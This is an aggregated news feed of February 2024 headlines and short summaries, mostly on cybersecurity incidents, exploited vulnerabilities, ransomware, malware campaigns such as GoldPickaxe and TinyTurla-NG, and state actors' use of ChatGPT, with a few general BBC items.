            The staff shortage in India’s special effects industry

            industry
            2024-02-19 https://www.bbc.co.uk/news/business-68017347
            With international studios sending more work to India, the industry is struggling to train enough staff. "

            Autosummary: "


            Week in review: AnyDesk phishing campaign targets employees, Microsoft fixes exploited zero-days

            financial exploits
            2024-02-18 https://www.helpnetsecurity.com/2024/02/18/week-in-review-anydesk-phishing-campaign-targets-employees-microsoft-fixes-exploited-zero-days/

            Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Integrating cybersecurity into vehicle design and manufacturing In this Help Net Security interview, Yaron Edan, CISO at REE Automotive, discusses the cybersecurity landscape of the automotive industry, mainly focusing on electric and connected vehicles. The future of cybersecurity: Anticipating changes with data analytics and automation In this Help Net Security interview, Mick Baccio, Staff Security Strategist at Splunk SURGe, discusses … More

            The post Week in review: AnyDesk phishing campaign targets employees, Microsoft fixes exploited zero-days appeared first on Help Net Security.

            "

            Autosummary: New infosec products of the week: February 16, 2024 Here’s a look at the most interesting products from the past week, featuring releases from Appdome, Center for Internet Security, Cyberhaven, LOKKER, Sumsub, and CompliancePro Solutions. Rise in cyberwarfare tactics fueled by geopolitical tensions In this Help Net Security interview, Matt Shelton, Head of Threat Research and Analysis at Google Cloud, discusses the latest Threat Horizons Report, which provides intelligence-derived trends, expertise, and recommendations on threat actors to help inform cloud customer security strategies in 2024. "


            FBI's Most-Wanted Zeus and IcedID Malware Mastermind Pleads Guilty

            exploits
            2024-02-18 https://thehackernews.com/2024/02/fbis-most-wanted-zeus-and-icedid.html
            A Ukrainian national has pleaded guilty in the U.S. to his role in two different malware schemes, Zeus and IcedID, between May 2009 and February 2021. Vyacheslav Igorevich Penchukov (aka Vyacheslav Igoravich Andreev, father, and tank), 37, was arrested by Swiss authorities in October 2022 and extradited to the U.S. last year. He was added to the FBI's most-wanted list in 2012. The U.S. "

            Autosummary: He has been charged with one count of conspiracy to commit fraud and related activity in connection with computers, one count of conspiracy to commit wire fraud, one count of conspiracy to commit money laundering, and one count of aggravated identity theft. "


            Brazil judge issues $48m fine over deadly sinkhole

            latam
            2024-02-18 https://www.bbc.co.uk/news/world-latin-america-68330474
            Seven people died when a construction site suddenly collapsed, swallowing pedestrians and vehicles. "

            Autosummary: "


            ESET fixed high-severity local privilege escalation bug in Windows products

            exploits
            2024-02-18 https://securityaffairs.com/159280/breaking-news/eset-local-privilege-escalation-windows.html
            Cybersecurity firm ESET has addressed a high-severity elevation of privilege vulnerability in its Windows security solution. ESET addressed a high-severity vulnerability, tracked as CVE-2024-0353 (CVSS score 7.8), in its Windows products. The vulnerability is a local privilege escalation issue that was submitted to the company by the Zero Day Initiative (ZDI). According to the advisory, […] "

            Autosummary: "


            Hacker arrested for selling bank accounts of US, Canadian users

            financial
            2024-02-18 https://www.bleepingcomputer.com/news/security/hacker-arrested-for-selling-bank-accounts-of-us-canadian-users/
            Ukraine's cyber police arrested a 31-year-old for running a cybercrime operation that gained access to bank accounts of American and Canadian users and sold it on the dark web. [...] "

            Autosummary: For his criminal activity, the suspect now faces up to 8 years of prison and the confiscation of all property, for violations in the Criminal Code of Ukraine - Part 2 of Article 209 (laundering of property obtained by criminal means), Part 2 of Article 361 (unauthorized interference with the operation of information systems, electronic communication networks), and Part 1 of Article 361-1 (creation for the purpose of illegal use, distribution, or sale of harmful software or technical means, as well as their distribution or sale). "


            CISA: Cisco ASA/FTD bug CVE-2020-3259 exploited in ransomware attacks

            exploits ransomware
            2024-02-17 https://securityaffairs.com/159244/cyber-crime/cisa-cisco-cve-2020-3259-akira-ransomware.html
            CISA warns that the Akira Ransomware gang is exploiting the Cisco ASA/FTD vulnerability CVE-2020-3259 (CVSS score: 7.5) in attacks in the wild. This week the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Cisco ASA and FTD bug, tracked as CVE-2020-3259 (CVSS score: 7.5), to its Known Exploited Vulnerabilities catalog. The vulnerability CVE-2020-3259 is an information disclosure issue that resides […] "

            Autosummary: CISA: Cisco ASA/FTD bug CVE-2020-3259 exploited in ransomware attacks. Pierluigi Paganini, February 17, 2024. CISA warns that the Akira Ransomware gang is exploiting the Cisco ASA/FTD vulnerability CVE-2020-3259 (CVSS score: 7.5) in attacks in the wild. "


            Ukrainian national faces up to 20 years in prison for his role in Zeus, IcedID malware schemes

            exploits
            2024-02-17 https://securityaffairs.com/159260/cyber-crime/penchukov-zeus-icedid-malware-campaigns.html
            A Ukrainian national pleaded guilty to his role in the Zeus and IcedID operations, which caused tens of millions of dollars in losses. Ukrainian national Vyacheslav Igorevich Penchukov has pleaded guilty to his key roles in the Zeus and IcedID malware operations. “Vyacheslav Igorevich Penchukov was a leader of two prolific malware groups that infected […] "

            Autosummary: Ukrainian national faces up to 20 years in prison for his role in Zeus, IcedID malware schemes. Pierluigi Paganini, February 17, 2024. A Ukrainian national pleaded guilty to his role in the Zeus and IcedID operations, which caused tens of millions of dollars in losses. "


            Cybersecurity sectors adjust as DDoS attacks reach new heights

            ciber
            2024-02-16 https://www.helpnetsecurity.com/2024/02/16/ddos-attacks-current-state-video/

            In this Help Net Security video, Andrey Slastenov, Head of Security Department at Gcore, discusses the findings of their latest report that provide insights into the current state of the DDoS protection market and cybersecurity trends. Key highlights from Q3–Q4 2023: The maximum attack power rose from 800 Gbps (1H 2023) to 1.6 Tbps. UDP floods constitute 62% of DDoS attacks. TCP floods and ICMP attacks remain popular at 16% and 12% respectively and SYN, … More

            The post Cybersecurity sectors adjust as DDoS attacks reach new heights appeared first on Help Net Security.

            "

            Autosummary: "


            U.S. State Government Network Breached via Former Employee's Account

            government
            2024-02-16 https://thehackernews.com/2024/02/us-state-government-network-breached.html
            The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has revealed that an unnamed state government organization's network environment was compromised via an administrator account belonging to a former employee. "This allowed the threat actor to successfully authenticate to an internal virtual private network (VPN) access point," the agency said in a joint advisory published "

            Autosummary: The admin account, which had access to a virtualized SharePoint server, also enabled the attackers to access another set of credentials stored in the server, which had administrative privileges to both the on-premises network and the Azure Active Directory (now called Microsoft Entra ID). "


            U.S. Government Disrupts Russian-Linked Botnet Engaged in Cyber Espionage

            government rusia-ucrania
            2024-02-16 https://thehackernews.com/2024/02/us-government-disrupts-russian-linked.html
            The U.S. government on Thursday said it disrupted a botnet comprising hundreds of small office and home office (SOHO) routers in the country that was put to use by the Russia-linked APT28 actor to conceal its malicious activities. "These crimes included vast spear-phishing and similar credential harvesting campaigns against targets of intelligence interest to the Russian government, such as U.S. "

            Autosummary: APT28, also tracked under the monikers BlueDelta, Fancy Bear, Fighting Ursa, Forest Blizzard (formerly Strontium), FROZENLAKE, Iron Twilight, Pawn Storm, Sednit, Sofacy, and TA422, is assessed to be linked to Unit 26165 of Russia's Main Directorate of the General Staff (GRU). "


            Microsoft Exchange vulnerability actively exploited

            exploits
            2024-02-16 https://www.malwarebytes.com/blog/news/2024/02/microsoft-exchange-vulnerability-actively-exploited
            One of Microsoft's Patch Tuesday fixes has flipped from "Likely to be Exploited" to "Exploitation Detected". "

            Autosummary: In a Windows network, NTLM (New Technology LAN Manager) is a suite of Microsoft security protocols intended to provide authentication, integrity, and confidentiality to users. "


            Cyberint Ransomania empowers organizations to proactively defend against ransomware attacks

            exploits ransomware
            2024-02-16 https://www.helpnetsecurity.com/2024/02/16/cyberint-ransomania/

            Cyberint is unveiling its latest contribution to the infosec community: Ransomania. This free-to-use web application gives users access to a complete repository of ransomware data gathered by the Cyberint Research Team, empowering organizations to combat ransomware with efficiency and collaboration, with the tool making data easily accessible and understandable to business professionals and cybersecurity experts alike. In today’s digital landscape, cyber risk is no longer an isolated concern but a critical factor shaping business operations … More

            The post Cyberint Ransomania empowers organizations to proactively defend against ransomware attacks appeared first on Help Net Security.

            "

            Autosummary: "


            U.S. authorities disrupt Russian intelligence’s botnet

            rusia-ucrania
            2024-02-16 https://www.helpnetsecurity.com/2024/02/16/us-authorities-disrupt-russian-intelligence-botnet/

            In January 2024, an operation dismantled a network of hundreds of SOHO routers controlled by GRU Military Unit 26165, also known as APT 28, Sofacy Group, Forest Blizzard, Pawn Storm, Fancy Bear, and Sednit. This network facilitated various crimes, including extensive spearphishing and credential harvesting against entities of interest to the Russian government, such as U.S. and foreign governments, military, and key security and corporate sectors. This botnet was distinct from prior GRU and Russian … More

            The post U.S. authorities disrupt Russian intelligence’s botnet appeared first on Help Net Security.

            "

            Autosummary: In January 2024, an operation dismantled a network of hundreds of SOHO routers controlled by GRU Military Unit 26165, also known as APT 28, Sofacy Group, Forest Blizzard, Pawn Storm, Fancy Bear, and Sednit. "


            Why We Must Democratize Cybersecurity

            ciber
            2024-02-16 https://thehackernews.com/2024/02/why-we-must-democratize-cybersecurity.html
            With breaches making the headlines on an almost weekly basis, the cybersecurity challenges we face are becoming visible not only to large enterprises, who have built security capabilities over the years, but also to small to medium businesses and the broader public. While this is creating greater awareness among smaller businesses of the need to improve their security posture, SMBs are often "

            Autosummary: Over the coming months, NTTSH will be busy adding more integrations, including but not limited to Meraki, Bitdefender, Sophos, Zoom, MalwareBytes, OneLogin, OKTA, Zscaler, AWS, and many more! A similar geographic trend is visible in the telecommunications sector, where the USA, UK, and Australia account for roughly 52% of ransomware attacks, while in education, the USA, UK, and Canada account for approximately 83%. Some examples of integrations currently available include: Cloud: Azure Management Plane and Microsoft 365 (coming soon), Google Workspace (coming soon); Endpoint Detection and Response: Microsoft Defender for Endpoint, VMWare Carbon Black and Crowdstrike Falcon Insight; Next-Generation Firewalls: Cisco Secure Firewall (ASA and Firepower Threat Defense), Fortinet Fortigate, and Palo Alto Networks NGFW. To provide a truly unique vantage point within NTTSH's products and services, GTIC leverages proprietary intelligence capabilities and NTT's position as the operator of one of the world's top 5 tier 1 Internet backbones, providing unequaled visibility of Internet telemetry to gain an understanding of and insight into the various threat actors, exploit tools and malware – and the tactics, techniques, and procedures used by attackers. "


            Malicious "SNS Sender" Script Abuses AWS for Bulk Smishing Attacks

            financial
            2024-02-16 https://thehackernews.com/2024/02/malicious-sns-sender-script-abuses-aws.html
            A malicious Python script known as SNS Sender is being advertised as a way for threat actors to send bulk smishing messages by abusing Amazon Web Services (AWS) Simple Notification Service (SNS). The SMS phishing messages are designed to propagate malicious links that are designed to capture victims' personally identifiable information (PII) and payment card details, SentinelOne "

            Autosummary: There is evidence to suggest that this operation may have been active since at least July 2022, going by bank logs containing references to ARDUINO_DAS that have been shared on carding forums like Crax Pro. A vast majority of the phishing kits are USPS-themed, with the campaigns directing users to bogus package tracking pages that prompt users to enter their personal and credit/debit card information, as evidenced by security researcher @JCyberSec_ on X (formerly Twitter) in early September 2022. "


            U.S. CISA: hackers breached a state government organization

            government
            2024-02-16 https://securityaffairs.com/159223/hacking/cisa-hackers-breached-government-org.html
            U.S. CISA revealed that threat actors breached an unnamed state government organization via an administrator account belonging to a former employee. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed that a threat actor gained access to an unnamed state government organization’s network environment via an administrator account belonging to a former employee. CISA and […] "

            Autosummary: CISA and the Multi-State Information Sharing & Analysis Center (MS-ISAC) published a joint Cybersecurity Advisory (CSA) to provide network defenders with the tactics, techniques, and procedures (TTPs) utilized by a threat actor. "


            Alpha ransomware linked to NetWalker operation dismantled in 2021

            exploits ransomware
            2024-02-16 https://www.bleepingcomputer.com/news/security/alpha-ransomware-linked-to-netwalker-operation-dismantled-in-2021/
            Security researchers analyzing the Alpha ransomware payload and modus operandi discovered overlaps with the now-defunct Netwalker ransomware operation. [...] "

            Autosummary: Symantec also reports that recent Alpha attacks extensively employ living-off-the-land tools, including Taskkill, PsExec, Net.exe, and Reg.exe, for evasion. "


            GoldPickaxe Trojan steals your face!

            exploits
            2024-02-16 https://www.malwarebytes.com/blog/news/2024/02/goldpickaxe-trojan-steals-your-face
            A group of cybercriminals is committing bank fraud by convincing victims to scan their IDs and faces. "

            Autosummary: As such MDM offers a wide range of features such as remote wipe, device tracking, and application management, which the cybercriminals take advantage of to install malicious applications and obtain the information they need. "


            CISA Warning: Akira Ransomware Exploiting Cisco ASA/FTD Vulnerability

            exploits ransomware
            2024-02-16 https://thehackernews.com/2024/02/cisa-warning-akira-ransomware.html
            The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a now-patched security flaw impacting Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software to its Known Exploited Vulnerabilities (KEV) catalog, following reports that it's being likely exploited in Akira ransomware attacks. The vulnerability in question is "

            Autosummary: In the fourth quarter of 2023 alone, the e-crime group listed 49 victims on its data leak portal, putting it behind LockBit (275), Play (110), ALPHV/BlackCat (102), NoEscape (76), 8Base (75), and Black Basta (72). "


            SolarWinds fixes critical RCE bugs in access rights audit solution

            exploits
            2024-02-16 https://www.bleepingcomputer.com/news/security/solarwinds-fixes-critical-rce-bugs-in-access-rights-audit-solution/
            SolarWinds has patched five remote code execution (RCE) flaws in its Access Rights Manager (ARM) solution, including three critical severity vulnerabilities that allow unauthenticated exploitation. [...] "

            Autosummary: With a clientele exceeding 300,000 worldwide, SolarWinds at the time serviced 96% of Fortune 500 companies, including high-profile companies like Apple, Google, and Amazon, as well as government organizations like the U.S. Military, Pentagon, State Department, NASA, NSA, Postal Service, NOAA, Department of Justice, and the Office of the President of the United States. "


            CISA adds Microsoft Exchange and Cisco ASA and FTD bugs to its Known Exploited Vulnerabilities catalog

            exploits
            2024-02-16 https://securityaffairs.com/159245/security/cisa-exchange-cisco-asa-ftd-known-exploited-vulnerabilities-catalog.html
            U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft Exchange and Cisco ASA and FTD bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following two vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: The vulnerability CVE-2020-3259 is an information disclosure issue that resides in the web services […] "

            Autosummary: "


            ALPHV ransomware claims loanDepot, Prudential Financial breaches

            financial exploits ransomware
            2024-02-16 https://www.bleepingcomputer.com/news/security/alphv-ransomware-claims-loandepot-prudential-financial-breaches/
            The ALPHV/Blackcat ransomware gang has claimed responsibility for the recent network breaches of Fortune 500 company Prudential Financial and mortgage lender loanDepot. [...] "

            Autosummary: This leading global financial services Fortune 500 company is the second-largest life insurance company in the U.S., with reported revenues of more than $50 billion in 2023, and it employs 40,000 people worldwide. "


            Microsoft fixes two zero-days with Patch Tuesday release

            exploits
            2024-02-16 https://www.computerworld.com/article/3712925/microsoft-fixes-two-zero-days-with-patch-tuesday-release.html#tk.rss_security

            Microsoft on Tuesday released 73 updates in its monthly Patch Tuesday release, addressing issues in Microsoft Exchange Server and Adobe and two zero-day flaws being actively exploited in Microsoft Outlook (CVE-2024-21410) and Microsoft Exchange (CVE-2024-21413).

            Including the recent reports that the Windows SmartScreen vulnerability (CVE-2024-21351) is under active exploitation, we have added “Patch Now” schedules to Microsoft Office, Windows and Exchange Server. The team at Readiness has provided this detailed infographic outlining the risks associated with each of the updates for this cycle.


            "

            Autosummary: Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge); Microsoft Windows (both desktop and server); Microsoft Office; Microsoft Exchange Server; Microsoft development platforms (.NET Core, .NET). Windows: Microsoft released two critical updates (CVE-2024-21357 and CVE-2024-20684) and 41 patches rated as important for Windows that cover the following components: Windows ActiveX and WDAC OLE DB Provider; Windows Defender; Windows Internet Connection Sharing; Windows Hyper-V; Windows Kernel. Browsers: Microsoft released three minor updates to the Chromium-based Edge (CVE-2024-1283, CVE-2024-1284, and CVE-2024-1059) and updated the following reported vulnerabilities: CVE-2024-1060, CVE-2024-0056, CVE-2024-0057, CVE-2024-20677 and CVE-2024-21312 (these were updated to resolve broken link issues). Chromium: CVE-2024-1060 (use after free in Canvas); CVE-2024-1077 (use after free in Network); CVE-2024-21399 (Microsoft Edge, Chromium-based). "


            Cyber-insurance and vulnerability scanning – Week in security with Tony Anscombe

            exploits
            2024-02-16 https://www.welivesecurity.com/en/videos/cyber-insurance-and-vulnerability-scanning-week-security-tony-anscombe/
            Here's how the results of vulnerability scans factor into decisions on cyber-insurance and how human intelligence comes into play in the assessment of such digital signals "

            Autosummary: "


            Smashing Security podcast #359: Declaring war on ransomware gangs, mobile muddles, and AI religion

            exploits ransomware
            2024-02-15 https://grahamcluley.com/smashing-security-podcast-359/
            Holy mackerel! AI is jumping on the religion bandwagon, ransomware gangs target hospitals, and what's happened to your old mobile phone number? All this and much much more is discussed in the latest edition of the "Smashing Security" podcast by cybersecurity veterans Graham Cluley and Carole Theriault, joined this week by "Ransomware Sommelier" Allan Liska. "

            Autosummary: Hosts: Graham Cluley – @gcluley; Carole Theriault – @caroletheriault. Guest: Allan Liska – @uuallan. Episode links: Sponsored by: BlackBerry – BlackBerry helps keep you one step ahead. "


            Offenders confused about ethics of AI child abuse

            industry
            2024-02-15 https://www.bbc.co.uk/news/technology-68297336
            A charity warns that creating or viewing such images is still illegal, even if the children are not real. "

            Autosummary: "


            5 free digital forensics tools to boost your investigations

            industry
            2024-02-15 https://www.helpnetsecurity.com/2024/02/15/free-digital-forensics-tools/

            Digital forensics plays a crucial role in analyzing and addressing cyberattacks, and it’s a key component of incident response. Additionally, digital forensics provides vital information for auditors, legal teams, and law enforcement agencies in the aftermath of an attack. Many cutting-edge digital forensics tools are on the market, but for those who cannot afford them, here’s a list of great free solutions to get you started. Autopsy Autopsy is a digital forensics platform widely employed … More

            The post 5 free digital forensics tools to boost your investigations appeared first on Help Net Security.

            "

            Autosummary: It scans various inputs, including disk images, files, and directories, extracting organized information like email addresses, credit card numbers, JPEG images, and JSON fragments. "


            Understanding the tactics of stealthy hunter-killer malware

            exploits industry
            2024-02-15 https://www.helpnetsecurity.com/2024/02/15/hunter-killer-malware/

            Picus Security has revealed a rise in hunter-killer malware, highlighting a significant shift in adversaries’ capability to pinpoint and thwart advanced enterprise defenses, including next-gen firewalls, antivirus programs, and EDR systems. There was a 333% increase in malware that can actively target defensive systems in an attempt to disable them. The identification of hunter-killer malware Drawing parallels from the stealthy and offensive nature of hunter-killer submarines, these malware strains evade security measures with precision and … More

            The post Understanding the tactics of stealthy hunter-killer malware appeared first on Help Net Security.

            "

            Autosummary: The identification of hunter-killer malware Drawing parallels from the stealthy and offensive nature of hunter-killer submarines, these malware strains evade security measures with precision and proactively seek out and impair security tools, firewalls, logging services, audit systems, and other protective measures within an infected system. "


            Critical Exchange Server Flaw (CVE-2024-21410) Under Active Exploitation

            exploits
            2024-02-15 https://thehackernews.com/2024/02/critical-exchange-server-flaw-cve-2024.html
            Microsoft on Wednesday acknowledged that a newly disclosed critical security flaw in Exchange Server has been actively exploited in the wild, a day after it released fixes for the vulnerability as part of its Patch Tuesday updates. Tracked as CVE-2024-21410 (CVSS score: 9.8), the issue has been described as a case of privilege escalation impacting the Exchange Server. "An attacker "

            Autosummary: The intrusions targeted organizations dealing with foreign affairs, energy, defense, and transportation, as well as those involved with labor, social welfare, finance, parenthood, and local city councils. "


            New ‘Gold Pickaxe’ Android, iOS malware steals your face for fraud

            exploits
            2024-02-15 https://www.bleepingcomputer.com/news/security/new-gold-pickaxe-android-ios-malware-steals-your-face-for-fraud/
            A new iOS and Android trojan named "GoldPickaxe" employs a social engineering scheme to trick victims into scanning their faces and ID documents, which are believed to be used to generate deepfakes for unauthorized banking access. [...] "

            Autosummary: On iOS devices, the malware establishes a web socket channel to receive the following commands: Heartbeat: ping the command and control (C2) server; init: send device information to the C2; upload_idcard: request the victim to take an image of their ID card; face: request the victim to take a video of their face; upgrade: display a bogus “device in use” message to prevent interruptions; album: sync photo library date (exfiltrate to a cloud bucket). "


            Nation-state actors are using AI services and LLMs for cyberattacks

            government ciber
            2024-02-15 https://securityaffairs.com/159147/apt/nation-state-actors-openai-ai-services-llms-cyberattacks.html
            Microsoft and OpenAI warn that nation-state actors are using ChatGPT to automate some phases of their attack chains, including target reconnaissance and social engineering attacks. Multiple nation-state actors are exploiting artificial intelligence (AI) and large language models (LLMs), including OpenAI ChatGPT, to automate their attacks and increase their sophistication. According to a study conducted by […] "

            Autosummary: The researchers observed the following APT groups using artificial intelligence (AI) and large language models (LLMs) in various phases of their attack chain: China-linked APT groups Charcoal Typhoon and Salmon Typhoon; Iran-linked APT group Crimson Sandstorm; North Korea-linked APT group Emerald Sleet; Russia-linked APT group Forest Blizzard. Nation-state actors are using AI services and LLMs for cyberattacks. Pierluigi Paganini, February 15, 2024. Microsoft and OpenAI warn that nation-state actors are using ChatGPT to automate some phases of their attack chains, including target reconnaissance and social engineering attacks. "


            New Qbot malware variant uses fake Adobe installer popup for evasion

            exploits
            2024-02-15 https://www.bleepingcomputer.com/news/security/new-qbot-malware-variant-uses-fake-adobe-installer-popup-for-evasion/
            The developer of Qakbot malware, or someone with access to the source code, seems to be experimenting with new builds as fresh samples have been observed in email campaigns since mid-December. [...] "

            Autosummary: Sophos' Advanced Threat Response Joint Task Force, or Sophos X-Ops for short, noticed fresh Qbot activity recently, with up to 10 new malware builds emerging since mid-December. "


            Battery maker Varta halts production after cyberattack

            ciber
            2024-02-15 https://www.helpnetsecurity.com/2024/02/15/varta-cyberattack/

            German battery manufacturer Varta was forced to shut down its IT systems and stop production as a result of a cyberattack. The Varta cyberattack The cyberattack occurred on Monday night and affected five of the company’s production plants and the administration. According to the German news outlet Finanzen, of the company’s five production sites, three are located in Germany, one in Romania and one in Indonesia. “The IT systems and thus also production were proactively … More

            The post Battery maker Varta halts production after cyberattack appeared first on Help Net Security.

            "

            Autosummary: "


            iOS users beware: GoldPickaxe trojan steals your facial data

            exploits
            2024-02-15 https://www.helpnetsecurity.com/2024/02/15/goldpickaxe-ios-trojan/

            Group-IB uncovered a new iOS trojan designed to steal users’ facial recognition data, identity documents, and intercept SMS. The trojan, dubbed GoldPickaxe.iOS by Group-IB’s Threat Intelligence unit, has been attributed to a Chinese-speaking threat actor codenamed GoldFactory, responsible for developing a suite of highly sophisticated banking trojans that also includes the earlier discovered GoldDigger and newly identified GoldDiggerPlus, GoldKefu, and GoldPickaxe for Android. To exploit the stolen biometric data, the threat actor utilizes AI face-swapping … More

            The post iOS users beware: GoldPickaxe trojan steals your facial data appeared first on Help Net Security.

            "

            Autosummary: GoldFactory is a resourceful team adept at various tactics, including impersonation, accessibility keylogging, fake banking websites, fake bank alerts, fake call screens, identity, and facial recognition data collection. “In our assessment, it appears imminent that GoldPickaxe will soon reach Vietnam’s shores, while its techniques and functionality will be actively incorporated into malware targeting other regions,” said Andrey Polovinkin, Malware Analyst, Threat Intelligence team, Group-IB. "


            How Nation-State Actors Target Your Business: New Research Exposes Major SaaS Vulnerabilities

            government
            2024-02-15 https://thehackernews.com/2024/02/how-nation-state-actors-target-your.html
            With many of the highly publicized 2023 cyber attacks revolving around one or more SaaS applications, SaaS has become a cause for genuine concern in many boardroom discussions. More so than ever, considering that GenAI applications are, in fact, SaaS applications. Wing Security (Wing), a SaaS security company, conducted an analysis of 493 SaaS-using companies in Q4 of 2023. Their study

            Autosummary: The TL;DR Version Of SaaS Security: 2023 brought some now infamous examples of malicious players leveraging or directly targeting SaaS, including the North Korean group UNC4899, 0ktapus ransomware group, and Russian Midnight Blizzard APT, which targeted well-known organizations such as JumpCloud, MGM Resorts, and Microsoft (respectively), and probably many others that often go unannounced. Wing Security (Wing), a SaaS security company, conducted an analysis of 493 SaaS-using companies in Q4 of 2023.


            Chinese Hackers Using Deepfakes in Advanced Mobile Banking Malware Attacks

            financial exploits
            2024-02-15 https://thehackernews.com/2024/02/chinese-hackers-using-deepfakes-in.html
            A Chinese-speaking threat actor codenamed GoldFactory has been attributed to the development of highly sophisticated banking trojans, including a previously undocumented iOS malware called GoldPickaxe that's capable of harvesting identity documents, facial recognition data, and intercepting SMS. "The GoldPickaxe family is available for both iOS and Android platforms,"

            Autosummary: "GoldFactory is a resourceful team adept at various tactics, including impersonation, accessibility keylogging, fake banking websites, fake bank alerts, fake call screens, identity, and facial recognition data collection," the researchers said. To mitigate the risks posed by GoldFactory and its suite of mobile banking malware, it's strongly advised not to click on suspicious links, not to install any app from untrusted sites, as they are a common vector for malware, and to periodically review the permissions given to apps, particularly those requesting Android's accessibility services.


            CISA adds Microsoft Windows bugs to its Known Exploited Vulnerabilities catalog

            exploits
            2024-02-15 https://securityaffairs.com/159171/hacking/cisa-adds-windows-bugs-known-exploited-vulnerabilities-catalog.html
            U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds 2 Microsoft Windows flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following two vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: This week, Microsoft released Patch Tuesday security updates for February 2024 that resolved a total of 72 vulnerabilities, […]

            Autosummary: "The fix for CVE-2023-36025 didn't consider the case where a .URL file points to a .URL file." — Will Dormann (@wdormann), February 13, 2024. According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.


            OpenAI blocks state-sponsored hackers from using ChatGPT

            government
            2024-02-15 https://www.bleepingcomputer.com/news/security/openai-blocks-state-sponsored-hackers-from-using-chatgpt/
            OpenAI has removed accounts used by state-sponsored threat groups from Iran, North Korea, China, and Russia, that were abusing its artificial intelligence chatbot, ChatGPT. [...]

            Autosummary: Generally, the threat actors used the large language models to enhance their strategic and operational capabilities, including reconnaissance, social engineering, evasion tactics, and generic information gathering.


            Over 13,000 Ivanti gateways vulnerable to actively exploited bugs

            exploits
            2024-02-15 https://www.bleepingcomputer.com/news/security/over-13-000-ivanti-gateways-vulnerable-to-actively-exploited-bugs/
            Thousands of Ivanti Connect Secure and Policy Secure endpoints remain vulnerable to multiple security issues first disclosed more than a month ago and which the vendor gradually patched. [...]

            Autosummary: Yutaka Sejiyama, a security researcher at Macnica, shared his Shodan scan results with BleepingComputer earlier today, reporting that as of February 15, 2024, 00:15 UTC, there were 13,636 Ivanti servers that had yet to apply patches for CVE-2024-21893, CVE-2024-21888, CVE-2023-46805, and CVE-2024-21887.


            Turla hackers backdoor NGOs with new TinyTurla-NG malware

            exploits
            2024-02-15 https://www.bleepingcomputer.com/news/security/turla-hackers-backdoor-ngos-with-new-tinyturla-ng-malware/
            Security researchers have identified and analyzed new malware they call TinyTurla-NG and TurlaPower-NG used by the Russian hacker group Turla to maintain access to a target's network and to steal sensitive data. [...]

            Autosummary: Using commands stored on compromised websites with an outdated WordPress version, the hackers can control TinyTurla-NG with the following commands: timeout: changes the number of minutes the backdoor sleeps between asking the C2 for new tasks; changeshell: instructs the backdoor to switch the current shell executing commands, i.e., from cmd.exe to PowerShell.exe, or vice versa.


            Massive utility scam campaign spreads via online ads

            financial
            2024-02-15 https://www.malwarebytes.com/blog/threat-intelligence/2024/02/massive-utility-scam-campaign-spreads-via-online-ads
            Malwarebytes researchers have discovered a prolific campaign of fraudulent energy ads shown to users via Google searches.

            Autosummary: This scam is widespread, and so our advice right now is to avoid clicking on any ad from search as the malicious ads largely outnumber the legitimate ones. The scam begins when a user searches for keywords related to their energy bill. Indicators of Compromise (Google advertiser accounts with advertiser name, advertiser ID and number of ads; scammer phone numbers; scammer domains) are listed in the original post.


            Rhysida ransomware cracked! Free decryption tool released

            exploits ransomware
            2024-02-15 https://www.tripwire.com/state-of-security/rhysida-ransomware-cracked-free-decryption-tool-released
            A group of South Korean security researchers have uncovered a vulnerability in the infamous Rhysida ransomware that provides a way for encrypted files to be unscrambled. Read more in my article on the Tripwire State of Security blog.

            Autosummary: The Rhysida decryptor is just the latest in a line of ransomware recovery tools that have appeared in recent years - including utilities to help the victims of the likes of Yanlouwang, MegaCortex, Akira, REvil, and a version of Conti.


            NICE Actimize introduces generative AI-based solutions designed to fight financial crime

            financial
            2024-02-15 https://www.helpnetsecurity.com/2024/02/15/nice-actimize-generative-ai-solutions/

            NICE Actimize announces three advanced generative AI-based solutions designed to fight financial crime and allow organizations to significantly reduce the manual and labor-intensive tasks currently employed in financial crime investigations and reporting. Offering up to a 50% reduction in investigation time and 70% time savings in SAR filing, these innovations provide unprecedented efficiency in financial crime and compliance risk management programs. With generative AI embedded into NICE Actimize’s advanced ActOne enterprise risk case management platform, … More

            The post NICE Actimize introduces generative AI-based solutions designed to fight financial crime appeared first on Help Net Security.

            "

            Autosummary: "


            Mitek MiControl empowers financial institutions to detect check fraud

            financial
            2024-02-15 https://www.helpnetsecurity.com/2024/02/15/mitek-micontrol/

            Mitek introduced MiControl, a comprehensive fraud management console that works with Mitek’s Check Fraud Defender. MiControl detects check fraud, reduces losses and further increases consumers’ online security. With its advanced visualizations and overlays, paired with business rules configured by the bank or financial institution, MiControl can decrease the time it takes for a fraud analyst to review and make a decision about a suspect check from up to 10 minutes to about 90 seconds. Despite … More

            The post Mitek MiControl empowers financial institutions to detect check fraud appeared first on Help Net Security.

            "

            Autosummary: "


            Russian Turla Hackers Target Polish NGOs with New TinyTurla-NG Backdoor

            rusia-ucrania
            2024-02-15 https://thehackernews.com/2024/02/russian-turla-hackers-target-polish.html
            The Russia-linked threat actor known as Turla has been observed using a new backdoor called TinyTurla-NG as part of a three-month-long campaign targeting Polish non-governmental organizations in December 2023. "TinyTurla-NG, just like TinyTurla, is a small "last chance" backdoor that is left behind to be used when all other unauthorized access/backdoor mechanisms have failed or been

            Autosummary: "


            Ivanti Pulse Secure Found Using 11-Year-Old Linux Version and Outdated Libraries

            Linux
            2024-02-15 https://thehackernews.com/2024/02/ivanti-pulse-secure-found-using-11-year.html
